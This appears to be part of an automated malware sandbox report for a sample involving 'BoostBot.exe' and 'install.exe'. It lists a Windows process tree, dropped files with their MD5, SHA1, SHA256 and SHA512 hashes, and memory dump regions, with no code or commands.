                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                  1⤵
                                                                                                    PID:4056
                                                                                                  • C:\Windows\system32\ApplicationFrameHost.exe
                                                                                                    C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                                                                                    1⤵
                                                                                                      PID:3740
                                                                                                    • C:\Windows\System32\InstallAgent.exe
                                                                                                      C:\Windows\System32\InstallAgent.exe -Embedding
                                                                                                      1⤵
                                                                                                        PID:3776
                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                        1⤵
                                                                                                          PID:3324
                                                                                                        • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                          C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                          1⤵
                                                                                                            PID:2108
                                                                                                          • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                            C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                            1⤵
                                                                                                              PID:3784

                                                                                                            Network

                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                            Replay Monitor

                                                                                                            Loading Replay Monitor...

                                                                                                            Downloads

                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                              Filesize

                                                                                                              338B

                                                                                                              MD5

                                                                                                              9cde8a730c801248001cfa63f6b9db8e

                                                                                                              SHA1

                                                                                                              5f81fdd927dfe1e1446142f9c2c1a41907941806

                                                                                                              SHA256

                                                                                                              f7578da34fc235099904fc5d423afffbf2b928d214cdbcc776db4dab05d113b9

                                                                                                              SHA512

                                                                                                              50eddc04d6d117265c4cebcaaf919e7546a9e8a85bff32b0c7f1026a88f25e6af051521528f6cc4a487afeac4e7e8343df9d92a497dc703623e8519a8e445ff5

                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5E5B0733CDA24F9EF7038FEEB6987C6E

                                                                                                              Filesize

                                                                                                              556B

                                                                                                              MD5

                                                                                                              bb74567bb32413f6e1f0cd6cda743615

                                                                                                              SHA1

                                                                                                              ff159a7019834d56e147aef95d81c890e8bb1e08

                                                                                                              SHA256

                                                                                                              6b54c250086257a88242b373cef292d9ced2e38a155039191560cc06ebee9a8f

                                                                                                              SHA512

                                                                                                              44cca6cc189beb98b05b24806952a8157493dd808988114762409fa5e6439d602dba5277f678b29ac6e75b52afc47e8aad56c01723a5821f6401659330560a88

                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

                                                                                                              Filesize

                                                                                                              408B

                                                                                                              MD5

                                                                                                              3425078c1d514e4a8facf4f4dde7ed94

                                                                                                              SHA1

                                                                                                              416c04dbef9eabcfa549eae48c255caaa819634a

                                                                                                              SHA256

                                                                                                              2c5d910dd2f30e078092a122b1929173f3911f8131dcf0197140a656d61d5213

                                                                                                              SHA512

                                                                                                              8325e079d071cdc57240ce217e497bb6dd4aec02e9977e8b501fb4fa0adc55076c510db92c33b77aa25327aad24b2872b7367cc9b5e98058d846573100a44af6

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\BoostBot.exe

                                                                                                              Filesize

                                                                                                              409KB

                                                                                                              MD5

                                                                                                              404ab800bbe49c36bd64d0d73600b59a

                                                                                                              SHA1

                                                                                                              4c8dff2702fada108f7477ad357067310b584366

                                                                                                              SHA256

                                                                                                              5465f02f24ee5c1fc9c9c27c86c209eeddc2ed607143e1b76ca9c9d9b7b84154

                                                                                                              SHA512

                                                                                                              d0ecd88adfd84d9d8e845281e0437368aadf3d1d6fb704d7c7630d1360697471c2a49584f968eeebd5b435f11af9ce3d06327f1835fa5d07a140f22c0f95fc11

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pvr0lksz.xx5.ps1

                                                                                                              Filesize

                                                                                                              1B

                                                                                                              MD5

                                                                                                              c4ca4238a0b923820dcc509a6f75849b

                                                                                                              SHA1

                                                                                                              356a192b7913b04c54574d18c28d46e6395428ab

                                                                                                              SHA256

                                                                                                              6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                                                              SHA512

                                                                                                              4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\install.exe

                                                                                                              Filesize

                                                                                                              162KB

                                                                                                              MD5

                                                                                                              152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                              SHA1

                                                                                                              c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                              SHA256

                                                                                                              a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                              SHA512

                                                                                                              2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                            • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187

                                                                                                              Filesize

                                                                                                              412B

                                                                                                              MD5

                                                                                                              b389ac19a7f0d4eaabab67c287637b47

                                                                                                              SHA1

                                                                                                              74aafaf5772a4ed1e1b175b214a68eec7eb78bf9

                                                                                                              SHA256

                                                                                                              aaa8be5adf6d1982e6416d3a0dc68393dfcdae4936effdeb59dfaa8b40d91028

                                                                                                              SHA512

                                                                                                              f65e1cc14ea929f184df1c53992f7b39591be9cde2273cb0712fe9bba2d5585f51be7563056c3f0c211efb284f6a00bde28a13eadfcc5e73ecae1923ae003dcf

                                                                                                            • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

                                                                                                              Filesize

                                                                                                              3KB

                                                                                                              MD5

                                                                                                              56efdb5a0f10b5eece165de4f8c9d799

                                                                                                              SHA1

                                                                                                              fa5de7ca343b018c3bfeab692545eb544c244e16

                                                                                                              SHA256

                                                                                                              6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

                                                                                                              SHA512

                                                                                                              91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

                                                                                                            • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                              Filesize

                                                                                                              1KB

                                                                                                              MD5

                                                                                                              d61d7f65117823a52913b840feed43c6

                                                                                                              SHA1

                                                                                                              e2580207e1611dcb229ee9d2b4bb0bd4dbcc884f

                                                                                                              SHA256

                                                                                                              d0d50cb4ab1fe4b5dcb9c081d49b33381336fc0ebc7629702ed94d47f7032a86

                                                                                                              SHA512

                                                                                                              e4cf12f3642ce8746f39bcfaa6265d105919d1cbe863119f4413aa4c5d307d7d69f0638bd0434d47f651e183ec209f02dd7d44954c790ef4d585155817ed8a3c

                                                                                                            • memory/584-110-0x0000020736070000-0x000002073609B000-memory.dmp

                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/584-117-0x0000020736070000-0x000002073609B000-memory.dmp

                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/584-111-0x0000020736070000-0x000002073609B000-memory.dmp

                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/584-118-0x00007FFDE2AA0000-0x00007FFDE2AB0000-memory.dmp

                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/584-109-0x0000020736040000-0x0000020736065000-memory.dmp

                                                                                                              Filesize

                                                                                                              148KB

                                                                                                            • memory/636-129-0x00007FFDE2AA0000-0x00007FFDE2AB0000-memory.dmp

                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/636-122-0x000001E644300000-0x000001E64432B000-memory.dmp

                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/636-128-0x000001E644300000-0x000001E64432B000-memory.dmp

                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/740-140-0x00007FFDE2AA0000-0x00007FFDE2AB0000-memory.dmp

                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/740-139-0x000001FD82D90000-0x000001FD82DBB000-memory.dmp

                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/740-133-0x000001FD82D90000-0x000001FD82DBB000-memory.dmp

                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/748-275-0x0000000006EB0000-0x0000000006EBA000-memory.dmp

                                                                                                              Filesize

                                                                                                              40KB

                                                                                                            • memory/900-151-0x00007FFDE2AA0000-0x00007FFDE2AB0000-memory.dmp

                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/900-150-0x00000294748D0000-0x00000294748FB000-memory.dmp

                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/900-144-0x00000294748D0000-0x00000294748FB000-memory.dmp

                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/992-155-0x000001CA40670000-0x000001CA4069B000-memory.dmp

                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/2516-55-0x00000000051B0000-0x0000000005242000-memory.dmp

                                                                                                              Filesize

                                                                                                              584KB

                                                                                                            • memory/2516-56-0x0000000005130000-0x0000000005196000-memory.dmp

                                                                                                              Filesize

                                                                                                              408KB

                                                                                                            • memory/2516-53-0x0000000000860000-0x00000000008CC000-memory.dmp

                                                                                                              Filesize

                                                                                                              432KB

                                                                                                            • memory/2516-54-0x0000000005580000-0x0000000005A7E000-memory.dmp

                                                                                                              Filesize

                                                                                                              5.0MB

                                                                                                            • memory/2516-58-0x0000000006190000-0x00000000061CE000-memory.dmp

                                                                                                              Filesize

                                                                                                              248KB

                                                                                                            • memory/2516-57-0x0000000005DA0000-0x0000000005DB2000-memory.dmp

                                                                                                              Filesize

                                                                                                              72KB

                                                                                                            • memory/3736-93-0x00007FFE22A10000-0x00007FFE22BEB000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.9MB

                                                                                                            • memory/3736-94-0x00007FFE21E90000-0x00007FFE21F3E000-memory.dmp

                                                                                                              Filesize

                                                                                                              696KB

                                                                                                            • memory/3736-92-0x000001DE515D0000-0x000001DE515FA000-memory.dmp

                                                                                                              Filesize

                                                                                                              168KB

                                                                                                            • memory/3904-98-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/3904-106-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/3904-101-0x00007FFE22A10000-0x00007FFE22BEB000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.9MB

                                                                                                            • memory/3904-102-0x00007FFE21E90000-0x00007FFE21F3E000-memory.dmp

                                                                                                              Filesize

                                                                                                              696KB

                                                                                                            • memory/3904-100-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/3904-97-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/3904-96-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/3904-95-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/5112-52-0x00007FFE06F20000-0x00007FFE0790C000-memory.dmp

                                                                                                              Filesize

                                                                                                              9.9MB

                                                                                                            • memory/5112-13-0x00007FFE06F23000-0x00007FFE06F24000-memory.dmp

                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/5112-19-0x000001DB5F870000-0x000001DB5F8E6000-memory.dmp

                                                                                                              Filesize

                                                                                                              472KB

                                                                                                            • memory/5112-20-0x00007FFE06F20000-0x00007FFE0790C000-memory.dmp

                                                                                                              Filesize

                                                                                                              9.9MB

                                                                                                            • memory/5112-17-0x00007FFE06F20000-0x00007FFE0790C000-memory.dmp

                                                                                                              Filesize

                                                                                                              9.9MB

                                                                                                            • memory/5112-15-0x000001DB5F740000-0x000001DB5F762000-memory.dmp

                                                                                                              Filesize

                                                                                                              136KB